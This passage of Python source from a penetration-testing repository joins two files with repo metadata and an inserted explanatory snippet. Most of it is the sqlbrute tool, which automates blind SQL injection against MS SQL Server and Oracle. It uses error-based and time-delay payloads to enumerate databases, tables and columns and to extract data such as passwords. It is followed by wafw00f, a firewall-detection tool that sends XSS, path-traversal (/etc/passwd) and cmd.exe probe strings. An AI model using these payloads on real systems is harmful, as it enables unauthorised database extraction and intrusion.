    if sys.platform == "win32": # timing is unreliable in python.org win32 version. I'd use linux for now
        waitfor = 10
    else:
        waitfor = 7
    if sys.platform == "win32":
        waitres = 5 # time.time() is hideously unreliable in windows
    else:
        waitres = 5
    tablesource = "sysobjects" # name of source to initially query
    namecol = "name" # column used for the database name
    substrfn = "SUBSTRING" # substring for SQL, substr for oracle
    reqcounter = 0 # number of test requests received
    testcounter = 0 # counter to track that requests have passed and failed appropriately
    testvar = 0
    requestsQueue = Queue.Queue()
    resultsQueue = Queue.Queue()
    # add any additional characters you need matched to this list
    matches = ["e","t","a","o","i","n","s","r","h","l","d","u","c","f","m","w","y","g","p","b","v","k","x","j","q","z","0","1","2","3","4","5","6","7","8","9","-",".","[_]","+","#","@","$"]

    def usage(self):
        print """
 ___  _____  __    ____  ____  __  __  ____  ____
/ __)( _ )( )  ( _ \( _ \( )( )(_ _)( ___)
\__ \ )(_)( )(__ ) _ < ) / )(__)( )( )__)
(___/(___/\\\\(____)(____/(_)\_)(______) (__) (____)
"""
        print "v.%s" % Version
        print """
Usage: %s options url
    [--help|-h] - this help
    [--verbose|-v] - verbose mode
    [--server|-d oracle|sqlserver] - type of database server (default MS SQL Server)
    [--error|-e regex] - regex to recognize error page (error testing only)
    [--threads|-s number] - number of threads (default 5)
    [--cookie|-k string] - cookies needed
    [--time|-n] - force time delay (waitfor) testing
    [--data|-p string] - POST data
    [--database|-f database] - database to enumerate data from (SQL Server)
    [--table|-t table] - table to extract data from
    [--column|-c column] - column to extract data from
    [--where|-w column=data] - restrict data returned to rows where column "column" matches "data"
    [--header|-x header::val] - header to add to the request (i.e. Referer::http://foobar/blah.asp)
    [--output|-o file] - file to send output to

Note: exploit will go on the end of the query or post data. This must be
correctly formatted for a SQL subquery to be appended.
""" % sys.argv[0]
        print '''e.g. %s --data "searchtype=state&state=1'" --error "NO RESULTS" --database webapp --table customer --column custnum --where password=password http://myapp/locator.asp''' % sys.argv[0]

    # buyer beware if you change anything below - execution starts here
    def main(self, argv=None):
        if argv is None:
            argv = sys.argv
        try:
            try:
                opts, args = getopt.getopt(argv[1:], "hvs:k:f:np:x:d:t:c:w:e:o:", \
                    ["help","verbose","server=","header=","error=","threads=","cookie=","database=","time","data=","table=","column=","where=","output="])
                if len(args) <> 1: # 1 arg is the URL
                    print "Args <> 1"
                    raise getopt.error
            except:
                raise getopt.error
            self.targeturl = args
            if sslSupport == False and re.search(r'https://', self.targeturl):
                print "You don't seem to have SSL support installed, so no https URLs for you"
                return 1
            for o,a in opts:
                if o in ("-v", "--verbose"):
                    self.verbose += 1
                if o in ("-x", "--header"):
                    self.headers += [a.split("::",1)]
                if o in ("-k", "--cookie"):
                    self.cookie = a
                if o in ("-h", "--help"):
                    self.usage()
                    return 1
                if o in ("-p", "--data"):
                    self.postdata = a
                    self.verb = "POST"
                if o in ("-n", "--time"):
                    self.method = "time"
                if o in ("-s", "--threads"):
                    self.num = int(a)
                    if self.num < 1:
                        print "Threads must be at least 1"
                        return 1
                if o in ("-d", "--server"):
                    if a == "oracle":
                        self.dbtype = a
                    if a == "sqlserver":
                        self.dbtype = a
                if o in ("-t", "--table"):
                    self.table = a
                if o in ("-c","--column"):
                    self.cols = a
                if o in ("-w", "--where"):
                    temp = a.split("=",1)
                    self.wherecol = temp[0]
                    self.whereval = temp[1]
                if o in ("-e", "--error"):
                    self.errorregex = a
                    self.method = "error"
                if o in ("-f", "--database"):
                    self.database = a
                if o in ("-o", "--output"):
                    self.outputfile = a
            if self.cols <> "":
                if self.table == "":
                    print "If requesting column data, you must specify table"
                    return 1
            if not self.errorregex:
                self.errorregex = r"(error|could not process)"
            if not self.verb:
                self.verb = "GET"
            if (self.verb == "POST" and not self.postdata):
                print "Specify some POST data"
                return 1
            if self.enumtype == "":
                if self.table == "" and self.cols == "":
                    if self.dbtype == "sqlserver" and not self.database:
                        self.enumtype = "database"
                    else:
                        self.enumtype = "table"
                else:
                    if self.table <> "" and self.cols == "":
                        self.enumtype = "column"
                    else:
                        self.enumtype = "data"
            if self.dbtype == "oracle":
                self.substrfn = "SUBSTR"
                self.tablesource = "USER_TABLES"
                self.namecol = "TABLE_NAME"
            if self.verbose:
                print "Database type: %s" % self.dbtype
                print "Table: %s" % self.table
                print "Columns: ", self.cols
                print "Enumeration mode: %s" % self.enumtype
                print "Threads: %d" % self.num
            if self.database and self.dbtype == "oracle":
                print "Database specification is not valid for Oracle"
                return 1
            if self.database != "": # add .. for between database and table
                self.database += ".."
        except:
            print "Incorrect options usage"
            self.usage()
            return 1

        # create worker classes to assign work to later
        for i in range(self.num):
            self.worker = Worker(self.requestsQueue, self.resultsQueue, i)
        # keep track of what we send off to the queues
        self.workRequests = {}
        if self.verbose:
            print "Testing the application to ensure your options work\n"
        if self.method == "error":
            self.testvar = self.testexploiterror()
        else:
            self.testvar = self.testexploittime()
        if self.testvar == 1:
            print """
To troubleshoot:
1) try using -v to see that the queries are correctly formatted
2) try using -vv to get the responses printed to the screen
3) fix your broken url/post data
4) check the error value you are using
5) you've specified the correct database type haven't you?"""
            return(1)
        print "This program will currently exit " + str(self.timeout) + " seconds after the last response comes in."
        for i in self.matches:
            if self.method == "error":
                self.gentesterror(i)
            else:
                self.gentesttime(i)
        self.showResults()

    def postReformat(self, postdata):
        return urllib.urlencode(cgi.parse_qsl(postdata))

    def querystringReformat(self, qsdata):
        temp = qsdata.split("?")
        if len(temp) == 2:
            return temp[0] + "?" + urllib.urlencode(cgi.parse_qsl(temp[1]))
        else:
            return qsdata

    def doRequest(self, expressionString, exploitdata, match, type, threadName):
        while True:
            if self.verb == "GET":
                req = urllib2.Request(self.querystringReformat(expressionString))
            else:
                req = urllib2.Request(self.querystringReformat(expressionString), self.postReformat(exploitdata))
            if self.cookie <> "":
                req.add_header("Cookie", self.cookie)
            if self.headers <> [[]]:
                for i in self.headers:
                    req.add_header(i[0], i[1])
            try:
                starttime = time.time() # get time at start of request
                resp = urllib2.urlopen(req)
            except urllib2.HTTPError, err: # catch an HTTP 500 error or similar here
                return err.read(), match, type, starttime, time.time()
            except:
                import traceback
                traceback.print_exc(file=sys.stderr)
                sys.stderr.flush()
                print "Unexpected error on: %s %s - Retrying in 5 seconds" % (expressionString, exploitdata)
                time.sleep(5)
            else:
                return resp.read(), match, type, starttime, time.time()

    def testexploiterror(self):
        if self.dbtype == "sqlserver":
            positivestring = self.andor + "exists (select * from master..sysdatabases)--"
            negativestring = self.andor + "not exists (select * from master..sysdatabases)--"
        if self.dbtype == "oracle":
            positivestring = self.andor + "exists (select * from USER_TABLES)--"
            negativestring = self.andor + "not exists (select * from USER_TABLES)--"
        self.genreq(positivestring, "", False)
        self.genreq(negativestring, "", False)
        while self.reqcounter != 2:
            try:
                id, results = self.resultsQueue.get_nowait()
            except Queue.Empty:
                if (time.time() - self.timetrack) > self.timeout: # if its been > (timeout) seconds since last successful resp
                    print "Timed out accessing application\n"
                    return(1)
                else:
                    continue
            self.timetrack = time.time() # update record of last successful response
            self.reqcounter += 1 # update number of requests received
            if self.verbose > 1:
                print 'Result %d: -> %s' % (id, urllib.unquote(self.workRequests[id]))
                print 'Response: %s' % results[0]
                print 'Results: %s, %s' % (results[1], results[2])
            if not re.search(self.errorregex, results[0]): # no error returned
                self.testcounter += 1 # increment counter 1 if no error returned
                if self.verbose > 1:
                    print "No Error"
            else: # error returned
                self.testcounter += 2 # increment counter 2 if error returned
                if self.verbose > 1:
                    print "Error"
        if self.testcounter == 3: # one failed, one passed request (success!)
            if self.verbose:
                print "Exploit and parameters appear to work\n"
            return(0)
        else: # failed :-(
            if self.andor == " OR ": # if we were using or, try changing to AND
                if self.verbose:
                    print "OR doesn't appear to work - trying AND"
                self.andor = " AND "
                self.reqcounter = 0
                self.testcounter = 0
                return (self.testexploiterror())
            else:
                print "User input exploit and parameters do not appear to work for error testing - trying time testing\n"
                return(self.testexploittime())

    def testexploittime(self):
        teststring = "%3Bwaitfor delay '0:0:" + str(self.waitfor) + "'--"
        self.genreq(teststring, "", False)
        waiting = True
        while waiting:
            try:
                id, results = self.resultsQueue.get_nowait()
            except Queue.Empty:
                continue
            waiting = False
            if self.verbose > 1:
                print 'Result %d: -> %s' % (id, urllib.unquote(self.workRequests[id]))
                print 'Response: %s' % results[0]
                print 'Start time: %s' % results[3]
                print 'Finish time: %s' % results[4]
            if results[4] - results[3] > (self.waitfor - self.waitres): # time testing worked
                self.method = "time"
                elapsed = results[4] - results[3]
                if elapsed > (self.waitfor * 2): # slow app
                    self.timeout *= (elapsed / self.waitfor)
                if self.verbose:
                    print "Exploit and parameters appear to work for time testing\n"
                return(0)
            else: # failed :-(
                print "User input exploit and parameters do not appear to work for time testing\n"
                return(1)

    # generate checks - these get multithreaded on the queue
    def genreq(self, request, match, type):
        if self.verb == "GET": # standard GET request - exploit querystring
            expressionString = self.targeturl[0] + request
            exploitdata = ""
        elif (self.verb == "GET" and self.postdata): # post request, but exploit querystring
            expressionString = self.targeturl[0] + request
            exploitdata = self.postdata
        else: # standard post request, exploit post data
            expressionString = self.targeturl[0]
            exploitdata = self.postdata + request
        id = self.worker.performWork(self.doRequest, expressionString, exploitdata, match, type)
        if self.verb == "GET":
            self.workRequests[id] = expressionString
        else:
            self.workRequests[id] = exploitdata

    # handle underscores
    def unquote(self, s):
        return re.sub(r'\[\_\]', '_', s)

    # generate the testing string as a series of CHAR()+CHAR() or CONCAT(CHR(),CHR()) strings
    def genchars(self, s):
        t = self.unquote(s)
        foo = len(t)
        if self.dbtype == "oracle": # use concat statements for oracle
            if foo == 1: # one character - no concat
                bar = "CHR(" + str(ord(t[0].upper())) + ")"
            else: # generate one concat statement
                if foo == 2:
                    bar = "CONCAT(CHR(" + str(ord(t[0].upper())) + "),CHR(" + str(ord(t[1].upper())) + "))"
                else: # generate mutiple statements
                    bar = ""
                    for i in range((foo-1)):
                        bar += "CONCAT(CHR(" + str(ord(t[i].upper())) + "),"
                    bar += "CHR(" + str(ord(t[foo-1].upper())) + ")"
                    for i in range(foo-1):
                        bar += ")"
        else: # sql server, so use + signs for concatenation
            if foo == 1: # one char
                bar = "CHAR(" + str(ord(t[0].upper())) + ")"
            else: # generate CHAR()+CHAR() statements
                bar = ""
                for i in range((foo-1)):
                    bar += "CHAR(" + str(ord(t[i].upper())) + ")%2B"
                bar += "CHAR(" + str(ord(t[foo-1].upper())) + ")"
        return bar

    # generate the guess cases - error
    def gentesterror(self, s):
        foo = ""
        if self.dbtype == "sqlserver":
            foo = "xtype='u' and "
        # SQL injection constructors - these assume we can just add these onto the end of the URL or post data
        if self.enumtype == "database": # sql server only
            pretable = self.andor + "exists (select * from master..sysdatabases where " + self.substrfn + "(UPPER(" + self.namecol + "),1,"
            midtable = ")="
            posttable = ")--"
        if self.enumtype == "table":
            pretable = self.andor + "exists (select * from " + self.database + self.tablesource + " where " + foo + self.substrfn + "(UPPER(" + self.namecol + "),1,"
            midtable = ")="
            posttable = ")--"
        if self.enumtype == "column":
            if self.dbtype == "sqlserver":
                pretable = self.andor + "exists (select * from " + self.database + "syscolumns where id = object_id('" + self.database + self.table + "') and " + self.substrfn + "(UPPER(" + self.namecol + "),1,"
                midtable = ")="
                posttable = ")--"
            else:
                pretable = self.andor + "exists (select * from ALL_TAB_COLUMNS where TABLE_NAME=UPPER('" + self.table + "') and " + self.substrfn + "(UPPER(COLUMN_NAME),1,"
                midtable = ")="
                posttable = ")--"
        if self.enumtype == "data":
            if self.dbtype == "sqlserver":
                if self.wherecol == "": # no where clause supplied
                    pretable = self.andor + "exists (select * from " + self.database + self.table + " where " + self.substrfn + "(UPPER(convert(varchar," + self.cols + ",2)),1,"
                else: # where clause supplied
                    pretable = self.andor + "exists (select * from " + self.database + self.table + " where " + self.wherecol + "='" + self.whereval + "' and " + self.substrfn + "(UPPER(convert(varchar," + self.cols + ",2)),1,"
                midtable = ")="
                posttable = ")--"
            else: # oracle
                if self.wherecol == "": # no where clause supplied
                    pretable = self.andor + "exists (select * from " + self.table + " where " + self.substrfn + "(UPPER(TO_CHAR(" + self.cols + ")),1,"
                else: # where clause supplied
                    pretable = self.andor + "exists (select * from " + self.table + " where " + self.wherecol + "='" + self.whereval + "' and " + self.substrfn + "(UPPER(TO_CHAR(" + self.cols + ")),1,"
                midtable = ")="
                posttable = ")--"
        teststring = self.genchars(s)
        self.genreq(pretable + str(len(self.unquote(s))) + midtable + teststring + posttable, s, True)

    # generate test cases - time
    def gentesttime(self, s):
        prewaitforlike = "%3Bif EXISTS (select name from master..sysdatabases where name like '"
        postwaitfor = "%') waitfor delay '0:0:" + str(self.waitfor) + "'--"
        predblike = "%3Bif EXISTS (select name from " + self.database + "sysobjects where xtype = 'u' and name like '"
        pretablike = "%3Bif EXISTS (select name from " + self.database + "syscolumns where id in (select id from " + self.database + "sysobjects where name = '" + self.table + "') and name like '"
        if self.whereval == "": # enumerating values in a specific column
            predatalike = "%3Bif EXISTS (select * from " + self.database + self.table + " where CONVERT(varchar," + self.cols + ",2) like '"
        else:
            prejoinlike = "%3Bif EXISTS (select * from " + self.database + self.table + " where CONVERT(varchar," + self.wherecol + ",2) = '" + self.whereval + "' AND CONVERT(varchar," + self.cols + ",2) like '"
        if self.enumtype == "database":
            self.genreq(prewaitforlike + s + postwaitfor, s, True)
        if self.enumtype == "table":
            self.genreq(predblike + s + postwaitfor, s, True)
        if self.enumtype == "column":
            self.genreq(pretablike + s + postwaitfor, s, True)
        if self.enumtype == "data":
            if self.whereval == "":
                self.genreq(predatalike + s + postwaitfor, s, True)
            else:
                self.genreq(prejoinlike + s + postwaitfor, s, True)

    def checkmatchtime(self, s):
        prewaitforequals = "%3Bif EXISTS (select name from master..sysdatabases where name = '"
        postwaitforequals = "') waitfor delay '0:0:" + str(self.waitfor) + "'--"
        predbequals = "%3Bif EXISTS (select name from " + self.database + "sysobjects where xtype = 'u' and name = '"
        pretabequals = "%3Bif EXISTS (select name from " + self.database + "syscolumns where id in (select id from " + self.database + "sysobjects where name = '" + self.table + "') and name = '"
        if self.whereval == "": # enumerating values in a specific column
            predataequals = "%3Bif EXISTS (select * from " + self.database + self.table + " where CONVERT(varchar," + self.cols + ",2) = '"
        else:
            prejoinequals = "%3Bif EXISTS (select * from " + self.database + self.table + " where CONVERT(varchar," + self.wherecol + ",2) = '" + self.whereval + "' AND CONVERT(varchar, " + self.cols + ",2) = '"
        if self.enumtype == "database":
            self.genreq(prewaitforequals + self.unquote(s) + postwaitforequals, s, False)
        if self.enumtype == "table":
            self.genreq(predbequals + self.unquote(s) + postwaitforequals, s, False)
        if self.enumtype == "column":
            self.genreq(pretabequals + self.unquote(s) + postwaitforequals, s, False)
        if self.enumtype == "data":
            if self.whereval == "":
                self.genreq(predataequals + self.unquote(s) + postwaitforequals, s, False)
            else:
                self.genreq(prejoinequals + self.unquote(s) + postwaitforequals, s, False)

    # generate check for whether we have an exact match (error testing)
    def checkmatcherror(self, s):
        foo = ""
        if self.dbtype == "sqlserver":
            foo = "xtype='u' and "
        # SQL injection constructors - these assume we can just add these onto the end of the URL or post data
        if self.enumtype == "database": # only valid for sql server
            pretable = self.andor + "exists (select * from master..sysdatabases where UPPER(" + self.namecol + ")="
            posttable = ")--"
        if self.enumtype == "table":
            pretable = self.andor + "exists (select * from " + self.database + self.tablesource + " where UPPER(" + self.namecol + ")="
            posttable = " )--"
        if self.enumtype == "column":
            if self.dbtype == "sqlserver":
                pretable = self.andor + "exists (select * from " + self.database + "syscolumns where id = object_id(" + self.genchars(self.database + self.table) + ") and UPPER(" + self.namecol + ")="
                posttable = ")--"
            else:
                pretable = self.andor + "exists (select * from ALL_TAB_COLUMNS where TABLE_NAME=UPPER(" + self.genchars(self.table) + ") and UPPER(COLUMN_NAME)="
                posttable = ")--"
        if self.enumtype == "data":
            if self.dbtype == "sqlserver":
                if self.wherecol == "": # no where clause supplied
                    pretable = self.andor + "exists (select * from " + self.database + self.table + " where UPPER(convert(varchar," + self.cols + ",2))="
                else: # where clause supplied
                    pretable = self.andor + "exists (select * from " + self.database + self.table + " where " + self.wherecol + "=" + self.genchars(self.whereval) + " and UPPER(convert(varchar," + self.cols + ",2))="
                posttable = ")--"
            else: # oracle
                if self.wherecol == "": # no where clause supplied
                    pretable = self.andor + "exists (select * from " + self.table + " where UPPER(TO_CHAR(" + self.cols + "))="
                else: # where clause supplied
                    pretable = self.andor + "exists (select * from " + self.table + " where " + self.wherecol + "=" + self.genchars(self.whereval) + " and UPPER(TO_CHAR(" + self.cols + "))="
                midtable = ")="
                posttable = ")--"
        teststring = self.genchars(s)
        self.genreq(pretable + teststring + posttable, s, False)

    # used to check results and exact checks
    def showResults(self):
        self.timetrack = time.time()
        while True:
            try:
                id, results = self.resultsQueue.get_nowait()
            except Queue.Empty:
                if (time.time() - self.timetrack) > self.timeout: # if its been > (timeout) seconds since last successful resp
                    break
                else:
                    continue
            self.timetrack = time.time() # update record of last successful response
            if self.verbose > 1:
                print 'Result %d: -> %s' % (id, urllib.unquote(self.workRequests[id]))
                print 'Results: %s, %s' % (results[1], results[2])
                print 'Start time: %s' % results[3]
                print 'Finish time: %s' % results[4]
            if self.verbose > 2:
                print 'Response: %s' % results[0]
            if self.method == "error": # if using error testing
                if not re.search(self.errorregex, results[0]): # no error returned
                    if self.verbose > 1:
                        print 'No error'
                    if results[2]: # if a guess match test
                        if self.verbose:
                            print "%s" % self.unquote(results[1])
                        self.checkmatcherror(results[1])
                    else:
                        print "Found: %s" % self.unquote(results[1])
                        for i in self.matches:
                            self.gentesterror(results[1]+i)
                        if self.outputfile != "":
                            outputhandle = file(self.outputfile, 'a', 0)
                            outputhandle.write(self.unquote(results[1])+"\r\n")
                            outputhandle.close()
                else: # no match
                    if self.verbose > 1:
                        print 'Error detected'
                    if not results[2]: # if was an exact match test (and failed) generate more
                        for i in self.matches:
                            self.gentesterror(results[1]+i)
            else: # if time based testing
                if results[4]-results[3] > (self.waitfor-self.waitres): # we had a match
                    if results[2]: # guess match test
                        if self.verbose:
                            print "%s" % self.unquote(results[1])
                        self.checkmatchtime(results[1])
                    else: # exact match test
                        print "Found: %s" % self.unquote(results[1])
                        for i in self.matches:
                            self.gentesttime(results[1]+i)
                        if self.outputfile != "":
                            outputhandle = file(self.outputfile, 'a', 0)
                            outputhandle.write(self.unquote(results[1])+"\r\n")
                            outputhandle.close()
                else: # no match
                    if not results[2]: # if it was an exact match condition (and failed) - iterate further
                        for i in self.matches:
                            self.gentesttime(results[1]+i)

# main called here
if __name__ == "__main__":
    instance = sqlbrute()
    sys.exit(instance.main())
size: 31,398
language: Python
extension: .py
total_lines: 586
avg_line_length: 40.296928
max_line_length: 227
alphanum_fraction: 0.530157
repo_name: pwnieexpress/raspberry_pwn
repo_stars: 1,024
repo_forks: 184
repo_open_issues: 8
repo_license: GPL-3.0
repo_extraction_date: 9/5/2024, 5:12:22 PM (Europe/Amsterdam)
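A hedged illustration of the error-based oracle sqlbrute relies on (not part of the tool itself): each character guess is confirmed by injecting an EXISTS subquery and checking whether the page matches the error regex, so "no error text" means the injected condition evaluated TRUE:

import re

# sqlbrute treats the absence of the error pattern as the condition being TRUE.
def page_says_true(page_body, errorregex=r"(error|could not process)"):
    return re.search(errorregex, page_body) is None

# e.g. after injecting " AND exists(select * from master..sysdatabases
# where SUBSTRING(UPPER(name),1,1)=CHAR(87))--" (hypothetical response bodies):
print(page_says_true("<html>1 result found</html>"))   # True: prefix matched
print(page_says_true("<html>error in query</html>"))   # False: wrong prefix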

id: 18,907
file_name: wafw00f.py
file_path: pwnieexpress_raspberry_pwn/src/pentest/waffit/wafw00f.py
content:
#!/usr/bin/env python
# wafw00f - Web Application Firewall Detection Tool
# by Sandro Gauci - enablesecurity.com (c) 2009
# and Wendel G. Henrique - Trustwave 2009

__license__ = """
Copyright (c) 2009, {Sandro Gauci|Wendel G. Henrique}
All rights reserved.

Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:

* Redistributions of source code must retain the above copyright notice, this
  list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
  this list of conditions and the following disclaimer in the documentation
  and/or other materials provided with the distribution.
* Neither the name of EnableSecurity or Trustwave nor the names of its
  contributors may be used to endorse or promote products derived from this
  software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""

import os
import httplib
from urllib import quote, unquote
import urllib2
from optparse import OptionParser
import logging
import socket
import sys

currentDir = os.getcwd()
scriptDir = os.path.dirname(sys.argv[0]) or '.'
os.chdir( scriptDir )

from libs.evillib import *

__version__ = '0.9.0'

lackofart = """
                  ^     ^
 _   __  _   ____ _   __  _    _   ____
///7/ /.' \ / __////7/ /,' \ ,' \ / __/
| V V // o // _/ | V V // 0 // 0 // _/
|_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                          <
                           ...'

WAFW00F - Web Application Firewall Detection Tool

By Sandro Gauci && Wendel G. Henrique
"""

class WafW00F(waftoolsengine):
    """
    WAF detection tool
    """
    xssstring = '<script>alert(1)</script>'
    dirtravstring = '../../../../etc/passwd'
    cleanhtmlstring = '<invalid>hello'

    def __init__(self, target='www.microsoft.com', port=80, ssl=False,
                 debuglevel=0, path='/', followredirect=True):
        """
        target: the hostname or ip of the target server
        port: defaults to 80
        ssl: defaults to false
        """
        waftoolsengine.__init__(self, target, port, ssl, debuglevel, path, followredirect)
        self.log = logging.getLogger('wafw00f')
        self.knowledge = dict(generic=dict(found=False, reason=''), wafname=list())

    def normalrequest(self, usecache=True, cacheresponse=True, headers=None):
        return self.request(usecache=usecache, cacheresponse=cacheresponse, headers=headers)

    def normalnonexistentfile(self, usecache=True, cacheresponse=True):
        import random
        path = self.path + str(random.randrange(1000, 9999)) + '.html'
        return self.request(path=path, usecache=usecache, cacheresponse=cacheresponse)

    def unknownmethod(self, usecache=True, cacheresponse=True):
        return self.request(method='OHYEA', usecache=usecache, cacheresponse=cacheresponse)

    def directorytraversal(self, usecache=True, cacheresponse=True):
        return self.request(path=self.path+self.dirtravstring, usecache=usecache, cacheresponse=cacheresponse)

    def cleanhtmlencoded(self, usecache=True, cacheresponse=True):
        string = self.path + quote(self.cleanhtmlstring) + '.html'
        return self.request(path=string, usecache=usecache, cacheresponse=cacheresponse)

    def cleanhtml(self, usecache=True, cacheresponse=True):
        string = self.path + self.cleanhtmlstring + '.html'
        return self.request(path=string, usecache=usecache, cacheresponse=cacheresponse)

    def xssstandard(self, usecache=True, cacheresponse=True):
        xssstringa = self.path + self.xssstring + '.html'
        return self.request(path=xssstringa, usecache=usecache, cacheresponse=cacheresponse)

    def xssstandardencoded(self, usecache=True, cacheresponse=True):
        xssstringa = self.path + quote(self.xssstring) + '.html'
        return self.request(path=xssstringa, usecache=usecache, cacheresponse=cacheresponse)

    def cmddotexe(self, usecache=True, cacheresponse=True):
        # thanks j0e
        string = self.path + 'cmd.exe'
        return self.request(path=string, usecache=usecache, cacheresponse=cacheresponse)

    attacks = [cmddotexe, directorytraversal, xssstandard, xssstandardencoded]

    def genericdetect(self, usecache=True, cacheresponse=True):
        reason = ''
        reasons = ['Blocking is being done at connection/packet level.',
                   'The server header is different when an attack is detected.',
                   'The server returned a different response code when a string trigged the blacklist.',
                   'It closed the connection for a normal request.',
                   'The connection header was scrambled.'
                   ]
        # test if response for a path containing html tags with known evil strings
        # gives a different response from another containing invalid html tags
        r = self.cleanhtml()
        if r is None:
            self.knowledge['generic']['reason'] = reasons[0]
            self.knowledge['generic']['found'] = True
            return True
        cleanresponse, _tmp = r
        r = self.xssstandard()
        if r is None:
            self.knowledge['generic']['reason'] = reasons[0]
            self.knowledge['generic']['found'] = True
            return True
        xssresponse, _tmp = r
        if xssresponse.status != cleanresponse.status:
            self.log.info('Server returned a different response when a script tag was tried')
            reason = reasons[2]
            reason += '\r\n'
            reason += 'Normal response code is "%s",' % cleanresponse.status
            reason += ' while the response code to an attack is "%s"' % xssresponse.status
            self.knowledge['generic']['reason'] = reason
            self.knowledge['generic']['found'] = True
            return True
        r = self.cleanhtmlencoded()
        cleanresponse, _tmp = r
        r = self.xssstandardencoded()
        if r is None:
            self.knowledge['generic']['reason'] = reasons[0]
            self.knowledge['generic']['found'] = True
            return True
        xssresponse, _tmp = r
        if xssresponse.status != cleanresponse.status:
            self.log.info('Server returned a different response when a script tag was tried')
            reason = reasons[2]
            reason += '\r\n'
            reason += 'Normal response code is "%s",' % cleanresponse.status
            reason += ' while the response code to an attack is "%s"' % xssresponse.status
            self.knowledge['generic']['reason'] = reason
            self.knowledge['generic']['found'] = True
            return True
        response, responsebody = self.normalrequest()
        normalserver = response.getheader('Server')
        for attack in self.attacks:
            r = attack(self)
            if r is None:
                self.knowledge['generic']['reason'] = reasons[0]
                self.knowledge['generic']['found'] = True
                return True
            response, responsebody = r
            attackresponse_server = response.getheader('Server')
            if attackresponse_server:
                if attackresponse_server != normalserver:
                    self.log.info('Server header changed, WAF possibly detected')
                    self.log.debug('attack response: %s' % attackresponse_server)
                    self.log.debug('normal response: %s' % normalserver)
                    reason = reasons[1]
                    reason += '\r\nThe server header for a normal response is "%s",' % normalserver
                    reason += ' while the server header a response to an attack is "%s.",' % attackresponse_server
                    self.knowledge['generic']['reason'] = reason
                    self.knowledge['generic']['found'] = True
                    return True
        for attack in self.wafdetectionsprio:
            if self.wafdetections[attack](self) is None:
                self.knowledge['generic']['reason'] = reasons[0]
                self.knowledge['generic']['found'] = True
                return True
        for attack in self.attacks:
            r = attack(self)
            if r is None:
                self.knowledge['generic']['reason'] = reasons[0]
                self.knowledge['generic']['found'] = True
                return True
            response, responsebody = r
            for h, v in response.getheaders():
                if scrambledheader(h):
                    self.knowledge['generic']['reason'] = reasons[4]
                    self.knowledge['generic']['found'] = True
                    return True
        return False

    def matchheader(self, headermatch, attack=False, ignorecase=True):
        import re
        detected = False
        header, match = headermatch
        if attack:
            requests = self.attacks
        else:
            requests = [self.normalrequest]
        for request in requests:
            r = request(self)
            if r is None:
                return
            response, responsebody = r
            headerval = response.getheader(header)
            if headerval:
                # set-cookie can have multiple headers, python gives it to us
                # concatinated with a comma
                if header == 'set-cookie':
                    headervals = headerval.split(', ')
                else:
                    headervals = [headerval]
                for headerval in headervals:
                    if ignorecase:
                        if re.match(match, headerval, re.IGNORECASE):
                            detected = True
                            break
                    else:
                        if re.match(match, headerval):
                            detected = True
                            break
                if detected:
                    break
        return detected

    def isbigip(self):
        return self.matchheader(('X-Cnection', '^close$'), attack=True)

    def iswebknight(self):
        detected = False
        for attack in self.attacks:
            r = attack(self)
            if r is None:
                return
            response, responsebody = r
            if response.status == 999:
                detected = True
                break
        return detected

    def ismodsecurity(self):
        detected = False
        for attack in self.attacks:
            r = attack(self)
            if r is None:
                return
            response, responsebody = r
            if response.status == 501:
                detected = True
                break
        return detected

    def issecureiis(self):
        # credit goes to W3AF
        detected = False
        headers = dict()
        headers['Transfer-Encoding'] = 'z' * 1025
        r = self.normalrequest(headers=headers)
        if r is None:
            return
        response, responsebody = r
        if response.status == 404:
            detected = True
        return detected

    def matchcookie(self, match):
        """
        a convenience function which calls matchheader
        """
        return self.matchheader(('set-cookie', match))

    def isairlock(self):
        # credit goes to W3AF
        return self.matchcookie('^AL[_-]?(SESS|LB)=')

    def isbarracuda(self):
        # credit goes to W3AF
        return self.matchcookie('^barra_counter_session=')

    def isdenyall(self):
        # credit goes to W3AF
        if self.matchcookie('^sessioncookie='):
            return True
        # credit goes to Sebastien Gioria
        # Tested against a Rweb 3.8
        # and modified by sandro gauci and someone else
        for attack in self.attacks:
            r = attack(self)
            if r is None:
                return
            response, responsebody = r
            if response.status == 200:
                if response.reason == 'Condition Intercepted':
                    return True
        return False

    def isbeeware(self):
        # disabled cause it was giving way too many false positives
        # credit goes to Sebastien Gioria
        detected = False
        r = self.xssstandard()
        if r is None:
            return
        response, responsebody = r
        if (response.status != 200) or (response.reason == 'Forbidden'):
            r = self.directorytraversal()
            if r is None:
                return
            response, responsebody = r
            if response.status == 403:
                if response.reason == "Forbidden":
                    detected = True
        return detected

    def isf5asm(self):
        # credit goes to W3AF
        return self.matchcookie('^TS[a-zA-Z0-9]{3,6}=')

    def isf5trafficshield(self):
        for hv in [['cookie', '^ASINFO='], ['server', 'F5-TrafficShield']]:
            r = self.matchheader(hv)
            if r is None:
                return
            elif r:
                return r
        return False

    def isteros(self):
        # credit goes to W3AF
        return self.matchcookie('^st8id=')

    def isnetcontinuum(self):
        # credit goes to W3AF
        return self.matchcookie('^NCI__SessionId=')

    def isbinarysec(self):
        # credit goes to W3AF
        return self.matchheader(('server', 'BinarySec'))

    def ishyperguard(self):
        # credit goes to W3AF
        return self.matchcookie('^WODSESSION=')

    def isprofense(self):
        """
        Checks for server headers containing "profense"
        """
        return self.matchheader(('server', 'profense'))

